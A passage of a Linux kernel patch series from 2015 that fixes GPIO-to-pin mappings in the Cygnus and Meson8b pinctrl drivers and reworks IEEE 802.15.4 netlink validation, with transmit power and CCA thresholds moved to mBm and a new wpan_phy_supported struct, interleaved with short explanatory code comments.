75e9143927a893aebad18b79e1bbeff4892c0d35 Mon Sep 17 00:00:00 2001 From: Ray Jui Date: Wed, 13 May 2015 17:06:23 -0700 Subject: [PATCH 076/872] pinctrl: cygnus: fixed incorrect GPIO-pin mapping This patch fixes an incorrect GPIO-to-pin mapping in the Cygnus GPIO driver Signed-off-by: Ray Jui Signed-off-by: Linus Walleij --- drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c b/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c index 4ad5c1a996e3..e406e3d8c1c7 100644 --- a/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c +++ b/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c @@ -643,7 +643,9 @@ static const struct cygnus_gpio_pin_range cygnus_gpio_pintable[] = { CYGNUS_PINRANGE(87, 104, 12), CYGNUS_PINRANGE(99, 102, 2), CYGNUS_PINRANGE(101, 90, 4), - CYGNUS_PINRANGE(105, 116, 10), + CYGNUS_PINRANGE(105, 116, 6), + CYGNUS_PINRANGE(111, 100, 2), + CYGNUS_PINRANGE(113, 122, 4), CYGNUS_PINRANGE(123, 11, 1), CYGNUS_PINRANGE(124, 38, 4), CYGNUS_PINRANGE(128, 43, 1), From 984cffdeaeb7ea5a21f49a89f638d84d62d08992 Mon Sep 17 00:00:00 2001 From: Carlo Caione Date: Sun, 17 May 2015 17:57:38 +0200 Subject: [PATCH 077/872] pinctrl: Fix gpio/pin mapping for Meson8b The num_pins field in the struct meson_domain_data must include also the missing pins in the Meson8b SoC, otherwise the GPIO <-> pin mapping is broken on this platform. Avoid also the dinamic allocation for GPIOs. 
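Why the numbers have to line up, using the values this patch sets:

/*
 * The GPIO-to-pin translation for these domains is effectively 1:1:
 *
 *     pin = domain->data->pin_base + gpio_offset
 *
 * so chip.base must equal pin_base and num_pins must also count the
 * holes in the pin numbering.  After the fix:
 *
 *     bank domain:    base = 0,   ngpio = 130  ->  GPIOs   0..129
 *     ao-bank domain: base = 130, ngpio = 16   ->  GPIOs 130..145
 */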
Signed-off-by: Carlo Caione Signed-off-by: Linus Walleij --- drivers/pinctrl/meson/pinctrl-meson.c | 2 +- drivers/pinctrl/meson/pinctrl-meson8b.c | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/pinctrl/meson/pinctrl-meson.c b/drivers/pinctrl/meson/pinctrl-meson.c index edcd140e0899..a70a5fe79d44 100644 --- a/drivers/pinctrl/meson/pinctrl-meson.c +++ b/drivers/pinctrl/meson/pinctrl-meson.c @@ -569,7 +569,7 @@ static int meson_gpiolib_register(struct meson_pinctrl *pc) domain->chip.direction_output = meson_gpio_direction_output; domain->chip.get = meson_gpio_get; domain->chip.set = meson_gpio_set; - domain->chip.base = -1; + domain->chip.base = domain->data->pin_base; domain->chip.ngpio = domain->data->num_pins; domain->chip.can_sleep = false; domain->chip.of_node = domain->of_node; diff --git a/drivers/pinctrl/meson/pinctrl-meson8b.c b/drivers/pinctrl/meson/pinctrl-meson8b.c index 2f7ea6229880..9677807db364 100644 --- a/drivers/pinctrl/meson/pinctrl-meson8b.c +++ b/drivers/pinctrl/meson/pinctrl-meson8b.c @@ -876,13 +876,13 @@ static struct meson_domain_data meson8b_domain_data[] = { .banks = meson8b_banks, .num_banks = ARRAY_SIZE(meson8b_banks), .pin_base = 0, - .num_pins = 83, + .num_pins = 130, }, { .name = "ao-bank", .banks = meson8b_ao_banks, .num_banks = ARRAY_SIZE(meson8b_ao_banks), - .pin_base = 83, + .pin_base = 130, .num_pins = 16, }, }; From 0cf0879acdbeff695963d78940b89497803ae55c Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:37 +0200 Subject: [PATCH 078/872] nl802154: cleanup invalid argument handling This patch cleanups the -EINVAL cases by combining them in one condition. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index f3c12f6a4a39..c01f4bbe7c7c 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -668,10 +668,8 @@ static int nl802154_set_pan_id(struct sk_buff *skb, struct genl_info *info) return -EBUSY; /* don't change address fields on monitor */ - if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR) - return -EINVAL; - - if (!info->attrs[NL802154_ATTR_PAN_ID]) + if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR || + !info->attrs[NL802154_ATTR_PAN_ID]) return -EINVAL; pan_id = nla_get_le16(info->attrs[NL802154_ATTR_PAN_ID]); @@ -691,10 +689,8 @@ static int nl802154_set_short_addr(struct sk_buff *skb, struct genl_info *info) return -EBUSY; /* don't change address fields on monitor */ - if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR) - return -EINVAL; - - if (!info->attrs[NL802154_ATTR_SHORT_ADDR]) + if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR || + !info->attrs[NL802154_ATTR_SHORT_ADDR]) return -EINVAL; short_addr = nla_get_le16(info->attrs[NL802154_ATTR_SHORT_ADDR]); From 673692faf3fb42ec73ef7210238b5869d6e2873d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:38 +0200 Subject: [PATCH 079/872] ieee802154: move validation check out of softmac This patch moves the value validation out of softmac layer. We need to be sure now that this value is accepted by the transceiver/mac802154 or "possible" hardmac drivers before calling rdev-ops. 
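A standalone illustration of the supported-channel check that nl802154_set_channel() now performs; the page-0 mask value used here is the 2.4 GHz mask that several drivers later in this series register:

#include <stdio.h>

#define BIT(n) (1UL << (n))

int main(void)
{
	unsigned long page0_supported = 0x7FFF800;	/* channels 11..26 set */
	int channel;

	for (channel = 0; channel <= 26; channel++)
		if (page0_supported & BIT(channel))
			printf("page 0, channel %d supported\n", channel);

	/* e.g. page 0, channel 5 is not in the mask, so such a request
	 * would now be rejected with -EINVAL before reaching the driver */
	return 0;
}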
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 28 +++++++++++++++++++++++++++- net/mac802154/cfg.c | 29 ----------------------------- 2 files changed, 27 insertions(+), 30 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index c01f4bbe7c7c..d750d9778ba7 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -625,7 +625,8 @@ static int nl802154_set_channel(struct sk_buff *skb, struct genl_info *info) channel = nla_get_u8(info->attrs[NL802154_ATTR_CHANNEL]); /* check 802.15.4 constraints */ - if (page > IEEE802154_MAX_PAGE || channel > IEEE802154_MAX_CHANNEL) + if (page > IEEE802154_MAX_PAGE || channel > IEEE802154_MAX_CHANNEL || + !(rdev->wpan_phy.channels_supported[page] & BIT(channel))) return -EINVAL; return rdev_set_channel(rdev, page, channel); @@ -674,6 +675,16 @@ static int nl802154_set_pan_id(struct sk_buff *skb, struct genl_info *info) pan_id = nla_get_le16(info->attrs[NL802154_ATTR_PAN_ID]); + /* TODO + * I am not sure about to check here on broadcast pan_id. + * Broadcast is a valid setting, comment from 802.15.4: + * If this value is 0xffff, the device is not associated. + * + * This could useful to simple deassociate an device. + */ + if (pan_id == cpu_to_le16(IEEE802154_PAN_ID_BROADCAST)) + return -EINVAL; + return rdev_set_pan_id(rdev, wpan_dev, pan_id); } @@ -695,6 +706,21 @@ static int nl802154_set_short_addr(struct sk_buff *skb, struct genl_info *info) short_addr = nla_get_le16(info->attrs[NL802154_ATTR_SHORT_ADDR]); + /* TODO + * I am not sure about to check here on broadcast short_addr. + * Broadcast is a valid setting, comment from 802.15.4: + * A value of 0xfffe indicates that the device has + * associated but has not been allocated an address. A + * value of 0xffff indicates that the device does not + * have a short address. + * + * I think we should allow to set these settings but + * don't allow to allow socket communication with it. + */ + if (short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_UNSPEC) || + short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_BROADCAST)) + return -EINVAL; + return rdev_set_short_addr(rdev, wpan_dev, short_addr); } diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index 70be9c799f8a..c63601582c71 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -73,10 +73,6 @@ ieee802154_set_channel(struct wpan_phy *wpan_phy, u8 page, u8 channel) ASSERT_RTNL(); - /* check if phy support this setting */ - if (!(wpan_phy->channels_supported[page] & BIT(channel))) - return -EINVAL; - ret = drv_set_channel(local, page, channel); if (!ret) { wpan_phy->current_page = page; @@ -112,16 +108,6 @@ ieee802154_set_pan_id(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); - /* TODO - * I am not sure about to check here on broadcast pan_id. - * Broadcast is a valid setting, comment from 802.15.4: - * If this value is 0xffff, the device is not associated. - * - * This could useful to simple deassociate an device. - */ - if (pan_id == cpu_to_le16(IEEE802154_PAN_ID_BROADCAST)) - return -EINVAL; - wpan_dev->pan_id = pan_id; return 0; } @@ -149,21 +135,6 @@ ieee802154_set_short_addr(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); - /* TODO - * I am not sure about to check here on broadcast short_addr. - * Broadcast is a valid setting, comment from 802.15.4: - * A value of 0xfffe indicates that the device has - * associated but has not been allocated an address. 
A - * value of 0xffff indicates that the device does not - * have a short address. - * - * I think we should allow to set these settings but - * don't allow to allow socket communication with it. - */ - if (short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_UNSPEC) || - short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_BROADCAST)) - return -EINVAL; - wpan_dev->short_addr = short_addr; return 0; } From 1a19cb680be0d4b06ce9a9d6516b8f45f544d3e8 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:39 +0200 Subject: [PATCH 080/872] ieee802154: change transmit power to s32 This patch change the transmit power from s8 to s32. This prepares to store a mbm value instead dbm inside the transmit power variable. The old interface keep the a s8 dbm value, which should be backward compatibility when assign s8 to s32. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 2 +- include/net/cfg802154.h | 2 +- include/net/mac802154.h | 2 +- net/ieee802154/nl802154.c | 6 +++--- net/mac802154/driver-ops.h | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 67d00fbc2e0e..02b6bb72304d 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1194,7 +1194,7 @@ at86rf230_set_hw_addr_filt(struct ieee802154_hw *hw, } static int -at86rf230_set_txpower(struct ieee802154_hw *hw, s8 db) +at86rf230_set_txpower(struct ieee802154_hw *hw, s32 db) { struct at86rf230_local *lp = hw->priv; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 6ea16c84293b..47804cddb46f 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -85,7 +85,7 @@ struct wpan_phy { u8 current_channel; u8 current_page; u32 channels_supported[IEEE802154_MAX_PAGE + 1]; - s8 transmit_power; + s32 transmit_power; struct wpan_phy_cca cca; __le64 perm_extended_addr; diff --git a/include/net/mac802154.h b/include/net/mac802154.h index 7df28a4c23f9..400e4e85c53f 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -213,7 +213,7 @@ struct ieee802154_ops { int (*set_hw_addr_filt)(struct ieee802154_hw *hw, struct ieee802154_hw_addr_filt *filt, unsigned long changed); - int (*set_txpower)(struct ieee802154_hw *hw, s8 dbm); + int (*set_txpower)(struct ieee802154_hw *hw, s32 dbm); int (*set_lbt)(struct ieee802154_hw *hw, bool on); int (*set_cca_mode)(struct ieee802154_hw *hw, const struct wpan_phy_cca *cca); diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index d750d9778ba7..f3185c71af10 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -207,7 +207,7 @@ static const struct nla_policy nl802154_policy[NL802154_ATTR_MAX+1] = { [NL802154_ATTR_PAGE] = { .type = NLA_U8, }, [NL802154_ATTR_CHANNEL] = { .type = NLA_U8, }, - [NL802154_ATTR_TX_POWER] = { .type = NLA_S8, }, + [NL802154_ATTR_TX_POWER] = { .type = NLA_S32, }, [NL802154_ATTR_CCA_MODE] = { .type = NLA_U32, }, [NL802154_ATTR_CCA_OPT] = { .type = NLA_U32, }, @@ -301,8 +301,8 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; } - if (nla_put_s8(msg, NL802154_ATTR_TX_POWER, - rdev->wpan_phy.transmit_power)) + if (nla_put_s32(msg, NL802154_ATTR_TX_POWER, + rdev->wpan_phy.transmit_power)) goto nla_put_failure; finish: diff --git a/net/mac802154/driver-ops.h b/net/mac802154/driver-ops.h index a0533357b9ea..57c1bdbfaa91 100644 --- a/net/mac802154/driver-ops.h +++ b/net/mac802154/driver-ops.h @@ 
-58,7 +58,7 @@ drv_set_channel(struct ieee802154_local *local, u8 page, u8 channel) return local->ops->set_channel(&local->hw, page, channel); } -static inline int drv_set_tx_power(struct ieee802154_local *local, s8 dbm) +static inline int drv_set_tx_power(struct ieee802154_local *local, s32 dbm) { might_sleep(); From e2eb173aaacd1a1bcd255d3e74ffb719e47eeadb Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:40 +0200 Subject: [PATCH 081/872] ieee802154: change transmit power to mbm This patch change the handling of transmit power level from dbm to mbm. This prepares to handle floating point transmit power levels values. The old netlink 802.15.4 will convert the dbm value to mbm for handling backward compatibility. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 3 ++- include/net/cfg802154.h | 1 + include/net/mac802154.h | 4 ++-- net/ieee802154/nl-mac.c | 4 ++-- net/mac802154/driver-ops.h | 4 ++-- 5 files changed, 9 insertions(+), 7 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 02b6bb72304d..3a303e4a3c07 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1194,9 +1194,10 @@ at86rf230_set_hw_addr_filt(struct ieee802154_hw *hw, } static int -at86rf230_set_txpower(struct ieee802154_hw *hw, s32 db) +at86rf230_set_txpower(struct ieee802154_hw *hw, s32 mbm) { struct at86rf230_local *lp = hw->priv; + s8 db = mbm / 100; /* typical maximum output is 5dBm with RG_PHY_TX_PWR 0x60, lower five * bits decrease power in 1dB steps. 0x60 represents extra PA gain of diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 47804cddb46f..b5b3f9f43084 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -85,6 +85,7 @@ struct wpan_phy { u8 current_channel; u8 current_page; u32 channels_supported[IEEE802154_MAX_PAGE + 1]; + /* current transmit_power in mBm */ s32 transmit_power; struct wpan_phy_cca cca; diff --git a/include/net/mac802154.h b/include/net/mac802154.h index 400e4e85c53f..e863a8557c0a 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -171,7 +171,7 @@ struct ieee802154_hw { * Returns either zero, or negative errno. * * set_txpower: - * Set radio transmit power in dB. Called with pib_lock held. + * Set radio transmit power in mBm. Called with pib_lock held. * Returns either zero, or negative errno. 
* * set_lbt @@ -213,7 +213,7 @@ struct ieee802154_ops { int (*set_hw_addr_filt)(struct ieee802154_hw *hw, struct ieee802154_hw_addr_filt *filt, unsigned long changed); - int (*set_txpower)(struct ieee802154_hw *hw, s32 dbm); + int (*set_txpower)(struct ieee802154_hw *hw, s32 mbm); int (*set_lbt)(struct ieee802154_hw *hw, bool on); int (*set_cca_mode)(struct ieee802154_hw *hw, const struct wpan_phy_cca *cca); diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index 2b4955d7aae5..4ba2e13f7a07 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -117,7 +117,7 @@ static int ieee802154_nl_fill_iface(struct sk_buff *msg, u32 portid, rtnl_unlock(); if (nla_put_s8(msg, IEEE802154_ATTR_TXPOWER, - params.transmit_power) || + params.transmit_power / 100) || nla_put_u8(msg, IEEE802154_ATTR_LBT_ENABLED, params.lbt) || nla_put_u8(msg, IEEE802154_ATTR_CCA_MODE, params.cca.mode) || @@ -510,7 +510,7 @@ int ieee802154_set_macparams(struct sk_buff *skb, struct genl_info *info) ops->get_mac_params(dev, ¶ms); if (info->attrs[IEEE802154_ATTR_TXPOWER]) - params.transmit_power = nla_get_s8(info->attrs[IEEE802154_ATTR_TXPOWER]); + params.transmit_power = nla_get_s8(info->attrs[IEEE802154_ATTR_TXPOWER]) * 100; if (info->attrs[IEEE802154_ATTR_LBT_ENABLED]) params.lbt = nla_get_u8(info->attrs[IEEE802154_ATTR_LBT_ENABLED]); diff --git a/net/mac802154/driver-ops.h b/net/mac802154/driver-ops.h index 57c1bdbfaa91..d289ae3f1e93 100644 --- a/net/mac802154/driver-ops.h +++ b/net/mac802154/driver-ops.h @@ -58,7 +58,7 @@ drv_set_channel(struct ieee802154_local *local, u8 page, u8 channel) return local->ops->set_channel(&local->hw, page, channel); } -static inline int drv_set_tx_power(struct ieee802154_local *local, s32 dbm) +static inline int drv_set_tx_power(struct ieee802154_local *local, s32 mbm) { might_sleep(); @@ -67,7 +67,7 @@ static inline int drv_set_tx_power(struct ieee802154_local *local, s32 dbm) return -EOPNOTSUPP; } - return local->ops->set_txpower(&local->hw, dbm); + return local->ops->set_txpower(&local->hw, mbm); } static inline int drv_set_cca_mode(struct ieee802154_local *local, From 32b23550ad64d9676f2218b3d5de46bacf98ef1d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:41 +0200 Subject: [PATCH 082/872] ieee802154: change cca ed level to mbm This patch change the handling of cca energy detection level from dbm to mbm. This prepares to handle floating point cca energy detection levels values. The old netlink 802.15.4 will convert the dbm value to mbm for handling backward compatibility. 
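The unit convention introduced across the last three patches, as a quick standalone check (the dBm values are arbitrary examples, not hardware limits):

#include <stdio.h>

static int dbm_to_mbm(int dbm) { return dbm * 100; }	/* 1 dBm == 100 mBm */
static int mbm_to_dbm(int mbm) { return mbm / 100; }	/* what drivers do today */

int main(void)
{
	int tx_power = dbm_to_mbm(5);		/*   5 dBm ->   500 mBm */
	int cca_ed   = dbm_to_mbm(-77);		/* -77 dBm -> -7700 mBm */

	printf("tx %d mBm (%d dBm), cca-ed %d mBm (%d dBm)\n",
	       tx_power, mbm_to_dbm(tx_power), cca_ed, mbm_to_dbm(cca_ed));
	return 0;	/* the finer mBm unit leaves room for fractional dBm later */
}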
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 3 ++- include/net/cfg802154.h | 1 + include/net/mac802154.h | 5 ++--- net/ieee802154/nl-mac.c | 4 ++-- net/mac802154/driver-ops.h | 4 ++-- 5 files changed, 9 insertions(+), 8 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 3a303e4a3c07..e68d45ed622e 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1268,9 +1268,10 @@ at86rf23x_get_desens_steps(struct at86rf230_local *lp, s32 level) } static int -at86rf230_set_cca_ed_level(struct ieee802154_hw *hw, s32 level) +at86rf230_set_cca_ed_level(struct ieee802154_hw *hw, s32 mbm) { struct at86rf230_local *lp = hw->priv; + s32 level = mbm / 100; if (level < lp->data->rssi_base_val || level > 30) return -EINVAL; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index b5b3f9f43084..9ced2c9fdbfc 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -91,6 +91,7 @@ struct wpan_phy { __le64 perm_extended_addr; + /* current cca ed threshold in mBm */ s32 cca_ed_level; /* PHY depended MAC PIB values */ diff --git a/include/net/mac802154.h b/include/net/mac802154.h index e863a8557c0a..71e245605ef8 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -184,7 +184,7 @@ struct ieee802154_hw { * Returns either zero, or negative errno. * * set_cca_ed_level - * Sets the CCA energy detection threshold in dBm. Called with pib_lock + * Sets the CCA energy detection threshold in mBm. Called with pib_lock * held. * Returns either zero, or negative errno. * @@ -217,8 +217,7 @@ struct ieee802154_ops { int (*set_lbt)(struct ieee802154_hw *hw, bool on); int (*set_cca_mode)(struct ieee802154_hw *hw, const struct wpan_phy_cca *cca); - int (*set_cca_ed_level)(struct ieee802154_hw *hw, - s32 level); + int (*set_cca_ed_level)(struct ieee802154_hw *hw, s32 mbm); int (*set_csma_params)(struct ieee802154_hw *hw, u8 min_be, u8 max_be, u8 retries); int (*set_frame_retries)(struct ieee802154_hw *hw, diff --git a/net/ieee802154/nl-mac.c b/net/ieee802154/nl-mac.c index 4ba2e13f7a07..cdc1cc3543f6 100644 --- a/net/ieee802154/nl-mac.c +++ b/net/ieee802154/nl-mac.c @@ -122,7 +122,7 @@ static int ieee802154_nl_fill_iface(struct sk_buff *msg, u32 portid, nla_put_u8(msg, IEEE802154_ATTR_CCA_MODE, params.cca.mode) || nla_put_s32(msg, IEEE802154_ATTR_CCA_ED_LEVEL, - params.cca_ed_level) || + params.cca_ed_level / 100) || nla_put_u8(msg, IEEE802154_ATTR_CSMA_RETRIES, params.csma_retries) || nla_put_u8(msg, IEEE802154_ATTR_CSMA_MIN_BE, @@ -519,7 +519,7 @@ int ieee802154_set_macparams(struct sk_buff *skb, struct genl_info *info) params.cca.mode = nla_get_u8(info->attrs[IEEE802154_ATTR_CCA_MODE]); if (info->attrs[IEEE802154_ATTR_CCA_ED_LEVEL]) - params.cca_ed_level = nla_get_s32(info->attrs[IEEE802154_ATTR_CCA_ED_LEVEL]); + params.cca_ed_level = nla_get_s32(info->attrs[IEEE802154_ATTR_CCA_ED_LEVEL]) * 100; if (info->attrs[IEEE802154_ATTR_CSMA_RETRIES]) params.csma_retries = nla_get_u8(info->attrs[IEEE802154_ATTR_CSMA_RETRIES]); diff --git a/net/mac802154/driver-ops.h b/net/mac802154/driver-ops.h index d289ae3f1e93..caecd5f43aa7 100644 --- a/net/mac802154/driver-ops.h +++ b/net/mac802154/driver-ops.h @@ -96,7 +96,7 @@ static inline int drv_set_lbt_mode(struct ieee802154_local *local, bool mode) } static inline int -drv_set_cca_ed_level(struct ieee802154_local *local, s32 ed_level) +drv_set_cca_ed_level(struct ieee802154_local *local, s32 mbm) { 
might_sleep(); @@ -105,7 +105,7 @@ drv_set_cca_ed_level(struct ieee802154_local *local, s32 ed_level) return -EOPNOTSUPP; } - return local->ops->set_cca_ed_level(&local->hw, ed_level); + return local->ops->set_cca_ed_level(&local->hw, mbm); } static inline int drv_set_pan_id(struct ieee802154_local *local, __le16 pan_id) From 72f655e44db9c7e835ceba96dc03cbe979d3f80d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:42 +0200 Subject: [PATCH 083/872] ieee802154: introduce wpan_phy_supported This patch introduce the wpan_phy_supported struct for wpan_phy. There is currently no way to check if a transceiver can handle IEEE 802.15.4 complaint values. With this struct we can check before if the transceiver supports these values before sending to driver layer. Signed-off-by: Alexander Aring Suggested-by: Phoebe Buckheister Acked-by: Varka Bhadram Cc: Alan Ott Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 8 ++++---- drivers/net/ieee802154/cc2520.c | 2 +- drivers/net/ieee802154/fakelb.c | 30 +++++++++++++++--------------- drivers/net/ieee802154/mrf24j40.c | 2 +- include/net/cfg802154.h | 6 +++++- net/ieee802154/nl-phy.c | 4 ++-- net/ieee802154/nl802154.c | 4 ++-- 7 files changed, 30 insertions(+), 26 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index e68d45ed622e..151d57f4320d 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1579,7 +1579,7 @@ at86rf230_detect_device(struct at86rf230_local *lp) case 3: chip = "at86rf231"; lp->data = &at86rf231_data; - lp->hw->phy->channels_supported[0] = 0x7FFF800; + lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 11; lp->hw->phy->symbol_duration = 16; break; @@ -1587,15 +1587,15 @@ at86rf230_detect_device(struct at86rf230_local *lp) chip = "at86rf212"; lp->data = &at86rf212_data; lp->hw->flags |= IEEE802154_HW_LBT; - lp->hw->phy->channels_supported[0] = 0x00007FF; - lp->hw->phy->channels_supported[2] = 0x00007FF; + lp->hw->phy->supported.channels[0] = 0x00007FF; + lp->hw->phy->supported.channels[2] = 0x00007FF; lp->hw->phy->current_channel = 5; lp->hw->phy->symbol_duration = 25; break; case 11: chip = "at86rf233"; lp->data = &at86rf233_data; - lp->hw->phy->channels_supported[0] = 0x7FFF800; + lp->hw->phy->supported.channels[0] = 0x7FFF800; lp->hw->phy->current_channel = 13; lp->hw->phy->symbol_duration = 16; break; diff --git a/drivers/net/ieee802154/cc2520.c b/drivers/net/ieee802154/cc2520.c index f833b8bb6663..84b28a05c5a1 100644 --- a/drivers/net/ieee802154/cc2520.c +++ b/drivers/net/ieee802154/cc2520.c @@ -653,7 +653,7 @@ static int cc2520_register(struct cc2520_private *priv) ieee802154_random_extended_addr(&priv->hw->phy->perm_extended_addr); /* We do support only 2.4 Ghz */ - priv->hw->phy->channels_supported[0] = 0x7FFF800; + priv->hw->phy->supported.channels[0] = 0x7FFF800; priv->hw->flags = IEEE802154_HW_OMIT_CKSUM | IEEE802154_HW_AACK | IEEE802154_HW_AFILT; diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index dc2bfb600b4b..91bbf030a443 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -149,35 +149,35 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) priv->hw = hw; /* 868 MHz BPSK 802.15.4-2003 */ - hw->phy->channels_supported[0] |= 1; + hw->phy->supported.channels[0] |= 1; /* 915 MHz BPSK 802.15.4-2003 */ - hw->phy->channels_supported[0] |= 0x7fe; + hw->phy->supported.channels[0] |= 
0x7fe; /* 2.4 GHz O-QPSK 802.15.4-2003 */ - hw->phy->channels_supported[0] |= 0x7FFF800; + hw->phy->supported.channels[0] |= 0x7FFF800; /* 868 MHz ASK 802.15.4-2006 */ - hw->phy->channels_supported[1] |= 1; + hw->phy->supported.channels[1] |= 1; /* 915 MHz ASK 802.15.4-2006 */ - hw->phy->channels_supported[1] |= 0x7fe; + hw->phy->supported.channels[1] |= 0x7fe; /* 868 MHz O-QPSK 802.15.4-2006 */ - hw->phy->channels_supported[2] |= 1; + hw->phy->supported.channels[2] |= 1; /* 915 MHz O-QPSK 802.15.4-2006 */ - hw->phy->channels_supported[2] |= 0x7fe; + hw->phy->supported.channels[2] |= 0x7fe; /* 2.4 GHz CSS 802.15.4a-2007 */ - hw->phy->channels_supported[3] |= 0x3fff; + hw->phy->supported.channels[3] |= 0x3fff; /* UWB Sub-gigahertz 802.15.4a-2007 */ - hw->phy->channels_supported[4] |= 1; + hw->phy->supported.channels[4] |= 1; /* UWB Low band 802.15.4a-2007 */ - hw->phy->channels_supported[4] |= 0x1e; + hw->phy->supported.channels[4] |= 0x1e; /* UWB High band 802.15.4a-2007 */ - hw->phy->channels_supported[4] |= 0xffe0; + hw->phy->supported.channels[4] |= 0xffe0; /* 750 MHz O-QPSK 802.15.4c-2009 */ - hw->phy->channels_supported[5] |= 0xf; + hw->phy->supported.channels[5] |= 0xf; /* 750 MHz MPSK 802.15.4c-2009 */ - hw->phy->channels_supported[5] |= 0xf0; + hw->phy->supported.channels[5] |= 0xf0; /* 950 MHz BPSK 802.15.4d-2009 */ - hw->phy->channels_supported[6] |= 0x3ff; + hw->phy->supported.channels[6] |= 0x3ff; /* 950 MHz GFSK 802.15.4d-2009 */ - hw->phy->channels_supported[6] |= 0x3ffc00; + hw->phy->supported.channels[6] |= 0x3ffc00; INIT_LIST_HEAD(&priv->list); priv->fake = fake; diff --git a/drivers/net/ieee802154/mrf24j40.c b/drivers/net/ieee802154/mrf24j40.c index fba2dfd910f7..f2a1bd122a74 100644 --- a/drivers/net/ieee802154/mrf24j40.c +++ b/drivers/net/ieee802154/mrf24j40.c @@ -750,7 +750,7 @@ static int mrf24j40_probe(struct spi_device *spi) devrec->hw->priv = devrec; devrec->hw->parent = &devrec->spi->dev; - devrec->hw->phy->channels_supported[0] = CHANNEL_MASK; + devrec->hw->phy->supported.channels[0] = CHANNEL_MASK; devrec->hw->flags = IEEE802154_HW_OMIT_CKSUM | IEEE802154_HW_AACK | IEEE802154_HW_AFILT; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 9ced2c9fdbfc..1941d7a79219 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -61,6 +61,10 @@ struct cfg802154_ops { struct wpan_dev *wpan_dev, bool mode); }; +struct wpan_phy_supported { + u32 channels[IEEE802154_MAX_PAGE + 1]; +}; + struct wpan_phy_cca { enum nl802154_cca_modes mode; enum nl802154_cca_opts opt; @@ -84,7 +88,7 @@ struct wpan_phy { */ u8 current_channel; u8 current_page; - u32 